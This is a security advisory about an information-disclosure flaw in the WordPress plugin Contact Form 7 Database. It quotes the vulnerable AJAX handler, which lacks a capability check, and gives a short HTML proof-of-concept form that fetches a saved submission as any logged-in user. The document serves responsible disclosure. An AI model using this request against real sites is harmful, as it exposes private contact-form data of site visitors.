Authenticated Information Disclosure Vulnerability in Contact Form 7 Database
After noticing that another plugin that saves contact form submissions from the plugin Contact Form 7 made them publicly accessible we took a look other plugins that also save them to see if any of them had a similar issue. In doing that we found that the plugin Contact Form 7 Database made saved contact form submissions available to anyone logged in to WordPress.
The plugin makes the function cf7d_edit_value_ajax_func() available to those logged in, through WordPress’ AJAX functionality (in the file /admin/edit-value.php):
74 | add_action('wp_ajax_cf7d_edit_value', 'cf7d_edit_value_ajax_func'); |
That function doesn’t perform any check as to the user role or capability before providing them with the content of a specified saved contact form submission:
75 76 77 78 79 80 81 82 83 84 85 86 | function cf7d_edit_value_ajax_func() { global $wpdb; $rid = ((isset($_POST['rid'])) ? (int)$_POST['rid'] : ''); if (!empty($rid)) { $sql = $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."cf7_data_entry WHERE `data_id` = %d", $rid); $rows = $wpdb->get_results($sql); $return = array(); foreach ($rows as $k => $v) { $return[$v->name] = stripslashes($v->value); } exit(json_encode($return)); |
By comparison the page where that AJAX requests is made from by the plugin is limited to those with the manage_option capability, which using only Administrator-level users have (in the file /admin/init.php):
20 | $menu = add_submenu_page('wpcf7', 'Database', 'Database', 'manage_options', 'cf7-data', 'cf7d_custom_submenu_page_callback'); |
When we notified the company behind the plugin of the vulnerability over a month ago and they responded “Our developers working to fix it.”, but the vulnerability has yet to be fixed.
Proof of Concept
The following proof of concept will show the first saved contact form submissions, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="cf7d_edit_value" /> <input type="hidden" name="rid" value="1" /> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
- May 3, 2017 – Developer notified.
- May 3, 2017 – Developer responds.